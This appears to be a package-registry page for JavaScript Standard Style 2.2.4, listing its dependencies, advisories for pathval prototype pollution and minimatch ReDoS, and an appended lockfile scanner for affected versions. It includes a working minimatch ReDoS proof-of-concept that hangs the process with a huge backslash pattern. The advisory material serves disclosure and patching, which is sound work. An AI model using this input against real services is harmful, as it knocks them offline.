Standard version 2.2.4 is a minor update to the JavaScript Standard Style package, building upon version 2.2.3. Both versions maintain the same core dependencies for linting and code style enforcement, including tools like glob, jscs, split, eslint, jshint, minimist, find-root, minimatch and run-parallel. The development dependencies also remain consistent, featuring mkdirp, rimraf, extend.js, and run-series, used for tasks like creating directories, removing files, extending objects, and running tasks in series during development.
The key difference between the two versions is their release date. Version 2.2.4 was released shortly after version 2.2.3. Given the identical dependencies and devDependencies, it's likely that version 2.2.4 includes minor bug fixes, minor internal improvements, or documentation updates that didn't warrant a change in the dependency tree.
For developers using Standard, this update represents a stable and incremental improvement to the linting experience. Because the core linting tools haven't changed, upgrading from 2.2.3 to 2.2.4 should be seamless and require no changes to existing configurations or workflows. Developers can expect the same consistent code style enforcement, with potential refinements to the underlying linting process, and should update to the latest version for the most robust and reliable experience. This maintains the package's commitment to providing a simple and opinionated approach towards JavaScript code style.
All vulnerabilities related to version 2.2.4 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
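To check a project for the two advisories above that state a fixed version (minimatch below 3.0.2, pathval below 1.1.1), the following added example, which is not part of the original page or of the Standard project, walks a lockfile's nested dependency tree and reports every affected copy. The lockfile layout (npm lockfileVersion 1), the helper names and the sample data are assumptions made for illustration.

```javascript
// Fixed-version thresholds exactly as stated in the advisories on this page.
const FIXED_IN = { minimatch: '3.0.2', pathval: '1.1.1' };

// Compare two x.y.z versions numerically; returns <0, 0 or >0.
// Simplification: pre-release and build suffixes are ignored.
function compareVersions(a, b) {
  const pa = a.split(/[-+]/)[0].split('.').map(Number);
  const pb = b.split(/[-+]/)[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Recursively walk the nested "dependencies" objects (assumed lockfileVersion 1
// layout) and collect every copy of a tracked package below its fixed version.
function findAffected(lock, path = []) {
  const hits = [];
  for (const [name, info] of Object.entries(lock.dependencies || {})) {
    const here = path.concat(name);
    const fixed = FIXED_IN[name];
    if (fixed && info.version && compareVersions(info.version, fixed) < 0) {
      hits.push({ name, version: info.version, fixedIn: fixed, via: here.join(' > ') });
    }
    hits.push(...findAffected(info, here)); // nested copies can differ from top level
  }
  return hits;
}

// Constructed sample lockfile: package versions here are illustrative only.
const sampleLock = {
  name: 'example-app', lockfileVersion: 1,
  dependencies: {
    standard: { version: '2.2.4', dependencies: {
      minimatch: { version: '2.0.1' },
      glob: { version: '4.3.5', dependencies: { minimatch: { version: '2.0.10' } } }
    } },
    minimatch: { version: '3.0.4' },
    chai: { version: '4.2.0', dependencies: { pathval: { version: '1.1.0' } } }
  }
};

for (const h of findAffected(sampleLock)) {
  console.log(`${h.name}@${h.version} (fixed in ${h.fixedIn}) via ${h.via}`);
}
```

A patched top-level copy does not clear a project: the nested copies under other packages are resolved separately, which is why the walk reports the dependency path for each hit.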